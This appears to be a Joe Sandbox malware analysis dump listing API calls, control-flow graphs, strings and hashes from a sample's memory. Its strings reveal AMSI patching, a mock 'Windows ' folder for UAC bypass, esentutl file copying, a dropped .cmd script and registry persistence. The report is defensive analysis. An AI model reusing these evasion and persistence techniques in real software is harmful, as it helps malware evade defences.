                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
                                                                                              • String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
                                                                                              • API String ID: 2171786310-3926298568
                                                                                              • Opcode ID: ae2af48a1c7b9f838f464717a1a132802b469ddfea4633c46eba7f55e4debd15
                                                                                              • Instruction ID: 5de1361bc899e3dcfabe20d7634d7112571a97cadeeb6304f26ac939ff2c7ffe
                                                                                              • Opcode Fuzzy Hash: ae2af48a1c7b9f838f464717a1a132802b469ddfea4633c46eba7f55e4debd15
                                                                                              • Instruction Fuzzy Hash: FE43003CA1C2AD8FCB12EB65DC90ADE73B5AF9D600F1080A59149AF654DF31AE81DF41

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 10970 31de678-31de67c 10971 31de681-31de686 10970->10971 10971->10971 10972 31de688-31dec81 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4740 * 2 call 31c4860 call 31c4778 call 31c30d4 call 31c46d4 * 2 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4740 call 31c7f2c call 31c49a0 call 31c4d74 call 31c4df0 call 31c4740 call 31c49a0 call 31c4d74 call 31c4df0 call 31d8788 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c47ec call 31c49a0 call 31d894c call 31c4860 call 31c49a0 call 31c47ec call 31c49a0 call 31d894c call 31c4860 call 31c49a0 call 31c47ec call 31c49a0 call 31d894c call 31c4860 call 31c49a0 call 31c47ec call 31c49a0 call 31d894c 10971->10972 11175 31dec87-31deedd call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 call 31c4860 call 31c49a0 call 31c46d4 call 31c47ec call 31c49a0 call 31c46d4 call 31d89d0 WaitForSingleObject CloseHandle * 2 call 31c4860 call 31c49a0 call 31c47ec call 31c49a0 call 31d894c call 31c4860 call 31c49a0 call 31c47ec call 31c49a0 call 31d894c call 31c4860 call 31c49a0 call 31c47ec call 31c49a0 call 31d894c call 31c4860 call 31c49a0 call 31c47ec call 31c49a0 
call 31d894c * 3 10972->11175 11176 31deee2-31def2f call 31c4500 call 31c4c60 call 31c4500 call 31c4c60 call 31c4500 10972->11176 11175->11176
                                                                                              APIs
                                                                                                • Part of subcall function 031D89D0: FreeLibrary.KERNEL32(74AE0000,00000000,00000000,00000000,00000000,0324738C,Function_0000662C,00000004,0324739C,0324738C,05F5E103,00000040,032473A0,74AE0000,00000000,00000000), ref: 031D8AAA
                                                                                                • Part of subcall function 031D8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 031D8814
                                                                                                • Part of subcall function 031D894C: LoadLibraryW.KERNEL32(bcrypt,?,0000089C,00000000,032473A8,031DA587,ScanString,032473A8,031DA93C,ScanBuffer,032473A8,031DA93C,Initialize,032473A8,031DA93C,UacScan), ref: 031D8960
                                                                                                • Part of subcall function 031D894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 031D897A
                                                                                                • Part of subcall function 031D894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,0000089C,00000000,032473A8,031DA587,ScanString,032473A8,031DA93C,ScanBuffer,032473A8,031DA93C,Initialize), ref: 031D89B6
                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,03247380,031DEF4C,OpenSession,03247380,031DEF4C,UacScan,03247380,031DEF4C,ScanBuffer,03247380,031DEF4C,OpenSession,03247380), ref: 031DED6E
                                                                                              • CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,03247380,031DEF4C,OpenSession,03247380,031DEF4C,UacScan,03247380,031DEF4C,ScanBuffer,03247380,031DEF4C,OpenSession), ref: 031DED76
                                                                                              • CloseHandle.KERNEL32(00000878,00000000,00000000,000000FF,ScanString,03247380,031DEF4C,OpenSession,03247380,031DEF4C,UacScan,03247380,031DEF4C,ScanBuffer,03247380,031DEF4C), ref: 031DED7F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$CloseFreeHandle$AddressCreateLoadObjectProcProcessSingleUserWait
                                                                                              • String ID: )"C:\Users\Public\Libraries\xrbjyllC.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
                                                                                              • API String ID: 3475578485-909933974
                                                                                              • Opcode ID: 26008050359e1b7a26920326abb5579ba783a37baa73fa8863655a2962eac804
                                                                                              • Instruction ID: d311ef7dcebe5efa90546b92710894cfcb748bddd17657f16750fb4561410c1a
                                                                                              • Opcode Fuzzy Hash: 26008050359e1b7a26920326abb5579ba783a37baa73fa8863655a2962eac804
                                                                                              • Instruction Fuzzy Hash: D0221238A183AD9FDB11FB65D891BCEB3B5AF9D201F1040A9A044EF254DF30AE41CB56

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 13139 31c1724-31c1736 13140 31c173c-31c174c 13139->13140 13141 31c1968-31c196d 13139->13141 13142 31c174e-31c175b 13140->13142 13143 31c17a4-31c17ad 13140->13143 13144 31c1a80-31c1a83 13141->13144 13145 31c1973-31c1984 13141->13145 13148 31c175d-31c176a 13142->13148 13149 31c1774-31c1780 13142->13149 13143->13142 13152 31c17af-31c17bb 13143->13152 13146 31c1a89-31c1a8b 13144->13146 13147 31c1684-31c16ad VirtualAlloc 13144->13147 13150 31c1938-31c1945 13145->13150 13151 31c1986-31c19a2 13145->13151 13153 31c16df-31c16e5 13147->13153 13154 31c16af-31c16dc call 31c1644 13147->13154 13155 31c176c-31c1770 13148->13155 13156 31c1794-31c17a1 13148->13156 13158 31c17f0-31c17f9 13149->13158 13159 31c1782-31c1790 13149->13159 13150->13151 13157 31c1947-31c195b Sleep 13150->13157 13160 31c19a4-31c19ac 13151->13160 13161 31c19b0-31c19bf 13151->13161 13152->13142 13162 31c17bd-31c17c9 13152->13162 13154->13153 13157->13151 13169 31c195d-31c1964 Sleep 13157->13169 13167 31c182c-31c1836 13158->13167 13168 31c17fb-31c1808 13158->13168 13170 31c1a0c-31c1a22 13160->13170 13163 31c19d8-31c19e0 13161->13163 13164 31c19c1-31c19d5 13161->13164 13162->13142 13165 31c17cb-31c17de Sleep 13162->13165 13172 31c19fc-31c19fe call 31c15cc 13163->13172 13173 31c19e2-31c19fa 13163->13173 13164->13170 13165->13142 13171 31c17e4-31c17eb Sleep 13165->13171 13176 31c18a8-31c18b4 13167->13176 13177 31c1838-31c1863 13167->13177 13168->13167 13175 31c180a-31c181e Sleep 13168->13175 13169->13150 13178 31c1a3b-31c1a47 13170->13178 13179 31c1a24-31c1a32 13170->13179 13171->13143 13180 31c1a03-31c1a0b 13172->13180 13173->13180 13175->13167 13182 31c1820-31c1827 Sleep 13175->13182 13188 31c18dc-31c18eb call 31c15cc 13176->13188 13189 31c18b6-31c18c8 13176->13189 13183 31c187c-31c188a 13177->13183 13184 31c1865-31c1873 13177->13184 13186 31c1a68 13178->13186 13187 31c1a49-31c1a5c 13178->13187 
13179->13178 13185 31c1a34 13179->13185 13182->13168 13194 31c188c-31c18a6 call 31c1500 13183->13194 13195 31c18f8 13183->13195 13184->13183 13193 31c1875 13184->13193 13185->13178 13196 31c1a6d-31c1a7f 13186->13196 13187->13196 13197 31c1a5e-31c1a63 call 31c1500 13187->13197 13198 31c18fd-31c1936 13188->13198 13202 31c18ed-31c18f7 13188->13202 13190 31c18cc-31c18da 13189->13190 13191 31c18ca 13189->13191 13190->13198 13191->13190 13193->13183 13194->13198 13195->13198 13197->13196
                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000000,?,031C2000), ref: 031C17D0
                                                                                              • Sleep.KERNEL32(0000000A,00000000,?,031C2000), ref: 031C17E6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              • Opcode ID: 6008ec0d3d48f8ddc556e197f0afe9f6dd259239c76b220a44ebfe04593b490c
                                                                                              • Instruction ID: 49b6ba351c12270eabd592fc878a7bbe48b296a382f44ad307d7e475c28d3ffc
                                                                                              • Opcode Fuzzy Hash: 6008ec0d3d48f8ddc556e197f0afe9f6dd259239c76b220a44ebfe04593b490c
                                                                                              • Instruction Fuzzy Hash: D6B1217A650780ABCB15EF69E988355FBE0FB9A310F19C2BED4058F38AC7749442C790

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • LoadLibraryW.KERNEL32(amsi), ref: 031D88C1
                                                                                                • Part of subcall function 031D8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,031D82FC,?,?,00000000,00000000,?,031D8215,00000000,KernelBASE,00000000,00000000,031D823C), ref: 031D82C1
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031D82C7
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(?,?), ref: 031D82D9
                                                                                                • Part of subcall function 031D7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 031D7DEC
                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 031D8920
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                                              • String ID: DllGetClassObject$W$amsi
                                                                                              • API String ID: 941070894-2671292670
                                                                                              • Opcode ID: 8ab3092199a580f4f0810a3977c5e5740e984d9610fa58905996e483bf942be4
                                                                                              • Instruction ID: fda63a92096a43f0192ce814d9286739185bdbc0525e83265e2dd6f222c66637
                                                                                              • Opcode Fuzzy Hash: 8ab3092199a580f4f0810a3977c5e5740e984d9610fa58905996e483bf942be4
                                                                                              • Instruction Fuzzy Hash: 18F0879044C381BBC200E6B88C45F4FBACC4BAA164F448A18B1E8AA2D2D77AD10583A7

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 13227 31c1a8c-31c1a9b 13228 31c1b6c-31c1b6f 13227->13228 13229 31c1aa1-31c1aa5 13227->13229 13230 31c1c5c-31c1c60 13228->13230 13231 31c1b75-31c1b7f 13228->13231 13232 31c1b08-31c1b11 13229->13232 13233 31c1aa7-31c1aae 13229->13233 13238 31c16e8-31c170b call 31c1644 VirtualFree 13230->13238 13239 31c1c66-31c1c6b 13230->13239 13234 31c1b3c-31c1b49 13231->13234 13235 31c1b81-31c1b8d 13231->13235 13232->13233 13240 31c1b13-31c1b27 Sleep 13232->13240 13236 31c1adc-31c1ade 13233->13236 13237 31c1ab0-31c1abb 13233->13237 13234->13235 13241 31c1b4b-31c1b5f Sleep 13234->13241 13242 31c1b8f-31c1b92 13235->13242 13243 31c1bc4-31c1bd2 13235->13243 13246 31c1ae0-31c1af1 13236->13246 13247 31c1af3 13236->13247 13244 31c1abd-31c1ac2 13237->13244 13245 31c1ac4-31c1ad9 13237->13245 13255 31c170d-31c1714 13238->13255 13256 31c1716 13238->13256 13240->13233 13249 31c1b2d-31c1b38 Sleep 13240->13249 13241->13235 13251 31c1b61-31c1b68 Sleep 13241->13251 13252 31c1b96-31c1b9a 13242->13252 13243->13252 13254 31c1bd4-31c1bd9 call 31c14c0 13243->13254 13246->13247 13253 31c1af6-31c1b03 13246->13253 13247->13253 13249->13232 13251->13234 13257 31c1bdc-31c1be9 13252->13257 13258 31c1b9c-31c1ba2 13252->13258 13253->13231 13254->13252 13261 31c1719-31c1723 13255->13261 13256->13261 13257->13258 13260 31c1beb-31c1bf2 call 31c14c0 13257->13260 13262 31c1bf4-31c1bfe 13258->13262 13263 31c1ba4-31c1bc2 call 31c1500 13258->13263 13260->13258 13266 31c1c2c-31c1c59 call 31c1560 13262->13266 13267 31c1c00-31c1c28 VirtualFree 13262->13267
                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000000,?), ref: 031C1B17
                                                                                              • Sleep.KERNEL32(0000000A,00000000,?), ref: 031C1B31
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              • Opcode ID: 779a84f47678a21e764b22ab85900d8649a15ff8fa9abc014735e4fb5de117ce
                                                                                              • Instruction ID: 9e51d632dc685ba80bf24570eb30016ce8419e67fdc26ff95207cbc26a5ac5ab
                                                                                              • Opcode Fuzzy Hash: 779a84f47678a21e764b22ab85900d8649a15ff8fa9abc014735e4fb5de117ce
                                                                                              • Instruction Fuzzy Hash: AB51ED796A03C0AFE715DF68D984756BBE4AB6A310F2881BED8048B387E770D445CB91

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 031DE5F6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmp
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CheckConnectionInternet
                                                                                              • String ID: Initialize$OpenSession$ScanBuffer
                                                                                              • API String ID: 3847983778-3852638603
                                                                                              • Opcode ID: 827c368eb867f0724c2275cfe803d0076bfc2f615137e4cf9b132d92c2d399bc
                                                                                              • Instruction ID: 6bbed1d75c8cf67630094e88b842222e1d6bcc8b24bb310ded62a316b4623a4b
                                                                                              • Opcode Fuzzy Hash: 827c368eb867f0724c2275cfe803d0076bfc2f615137e4cf9b132d92c2d399bc
                                                                                              • Instruction Fuzzy Hash: 8E413D39B2835C9FDB12EBA5D851ADEB3B9EF9D601F204429E040AF244DF30AD018B65
                                                                                              APIs
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,031D823C,?,?,00000000,?,031D7A7E,ntdll,00000000,00000000,031D7AC3,?,?,00000000), ref: 031D820A
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNELBASE(?), ref: 031D821E
                                                                                                • Part of subcall function 031D8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,031D82FC,?,?,00000000,00000000,?,031D8215,00000000,KernelBASE,00000000,00000000,031D823C), ref: 031D82C1
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031D82C7
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(?,?), ref: 031D82D9
                                                                                              • WinExec.KERNEL32(?,?), ref: 031D8624
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                               • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                               • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp
                                                                                               • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmp
                                                                                               • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmp
                                                                                               • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule$AddressProc$Exec
                                                                                              • String ID: Kernel32$WinExec
                                                                                              • API String ID: 2292790416-3609268280
                                                                                              • Opcode ID: cd0aa1fba0ba3a7269d6e667d5e2d4304459c18e89f707c30e4f9f00e10e353f
                                                                                              • Instruction ID: d2aa1d47d78b6c0d64cb5d6613c6d4e7ca0fdd99e8ddf9cae0ce4cf77bd5d64d
                                                                                              • Opcode Fuzzy Hash: cd0aa1fba0ba3a7269d6e667d5e2d4304459c18e89f707c30e4f9f00e10e353f
                                                                                              • Instruction Fuzzy Hash: AE013C79618748BFDB01EFE9EC12F5E7BADE74EA10F518460B910DA640EB74AD008A25
                                                                                              APIs
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,031D823C,?,?,00000000,?,031D7A7E,ntdll,00000000,00000000,031D7AC3,?,?,00000000), ref: 031D820A
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNELBASE(?), ref: 031D821E
                                                                                                • Part of subcall function 031D8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,031D82FC,?,?,00000000,00000000,?,031D8215,00000000,KernelBASE,00000000,00000000,031D823C), ref: 031D82C1
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031D82C7
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(?,?), ref: 031D82D9
                                                                                              • WinExec.KERNEL32(?,?), ref: 031D8624
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                               • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                               • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp
                                                                                               • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmp
                                                                                               • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmp
                                                                                               • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule$AddressProc$Exec
                                                                                              • String ID: Kernel32$WinExec
                                                                                              • API String ID: 2292790416-3609268280
                                                                                              • Opcode ID: 74f3a65676f6cfe5261ec111d8963727215f78149d523705c4e4c75e5f735296
                                                                                              • Instruction ID: a589008521eeed88866390c24a5c2939782c805fb7e74878d256d18fb3f8cf5c
                                                                                              • Opcode Fuzzy Hash: 74f3a65676f6cfe5261ec111d8963727215f78149d523705c4e4c75e5f735296
                                                                                              • Instruction Fuzzy Hash: 74F04F79618748BFDB01FFE9EC12F5E7BADE74EA10F518460F910DA640EB74AD008A25
                                                                                              APIs
                                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,031D5D74,?,?,031D3900,00000001), ref: 031D5C88
                                                                                              • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,031D5D74,?,?,031D3900,00000001), ref: 031D5CB6
                                                                                                • Part of subcall function 031C7D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,031D3900,031D5CF6,00000000,031D5D74,?,?,031D3900), ref: 031C7DAA
                                                                                                • Part of subcall function 031C7F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,031D3900,031D5D11,00000000,031D5D74,?,?,031D3900,00000001), ref: 031C7FB7
                                                                                              • GetLastError.KERNEL32(00000000,031D5D74,?,?,031D3900,00000001), ref: 031D5D1B
                                                                                                • Part of subcall function 031CA778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,031CC3D9,00000000,031CC433), ref: 031CA797
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                               • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                               • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp
                                                                                               • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmp
                                                                                               • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmp
                                                                                               • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                              • String ID:
                                                                                              • API String ID: 503785936-0
                                                                                              • Opcode ID: 993e9162c2331374ce41db6d2141dbdb149b82f11ac98688b2a451200280d178
                                                                                              • Instruction ID: 5cd3799ede61de5184bf5ce98243492592ff3ef33eda5cf3b4c94fd9956a3fa7
                                                                                              • Opcode Fuzzy Hash: 993e9162c2331374ce41db6d2141dbdb149b82f11ac98688b2a451200280d178
                                                                                              • Instruction Fuzzy Hash: A031B338A047899FDB01EFA8C8817DDBBF5AF1E700F508069D514AF380DB7559048BA1
                                                                                              APIs
                                                                                              • RegOpenKeyA.ADVAPI32(?,00000000,0333BA58), ref: 031DF258
                                                                                              • RegSetValueExA.ADVAPI32(0000089C,00000000,00000000,00000001,00000000,0000001C,00000000,031DF2C3), ref: 031DF290
                                                                                              • RegCloseKey.ADVAPI32(0000089C,0000089C,00000000,00000000,00000001,00000000,0000001C,00000000,031DF2C3), ref: 031DF29B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                               • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                               • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp
                                                                                               • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmp
                                                                                               • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmp
                                                                                               • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenValue
                                                                                              • String ID:
                                                                                              • API String ID: 779948276-0
                                                                                              • Opcode ID: 8a646a491d262940c4eb15864a770592ee30e87657d16fbc1b19fd915c872701
                                                                                              • Instruction ID: 08cd4b4e108d43d17fb3f75b23432ae40448a90cac345abfe53809da7e67e390
                                                                                              • Opcode Fuzzy Hash: 8a646a491d262940c4eb15864a770592ee30e87657d16fbc1b19fd915c872701
                                                                                              • Instruction Fuzzy Hash: 37116A79618388AFDB01EFA9D891E9EBBFCEB1C300F504429B404DB654DB30EE008B50
                                                                                              APIs
                                                                                              • RegOpenKeyA.ADVAPI32(?,00000000,0333BA58), ref: 031DF258
                                                                                              • RegSetValueExA.ADVAPI32(0000089C,00000000,00000000,00000001,00000000,0000001C,00000000,031DF2C3), ref: 031DF290
                                                                                              • RegCloseKey.ADVAPI32(0000089C,0000089C,00000000,00000000,00000001,00000000,0000001C,00000000,031DF2C3), ref: 031DF29B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                               • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmp
                                                                                               • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp
                                                                                               • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmp
                                                                                               • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmp
                                                                                               • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenValue
                                                                                              • String ID:
                                                                                              • API String ID: 779948276-0
                                                                                              • Opcode ID: 2ec1a98859d80129217b147c314aec18ead659b26daf2735f1ec6163baf6276a
                                                                                              • Instruction ID: 66215147538bfe6899d6ba5051f5e3c203b2a62b9643400cf49955c05f32c09f
                                                                                              • Opcode Fuzzy Hash: 2ec1a98859d80129217b147c314aec18ead659b26daf2735f1ec6163baf6276a
                                                                                              • Instruction Fuzzy Hash: 08118C79618388AFDB01EFA9D891E9EBBFCEB1C300F504429F404DB654DB30EA008B50
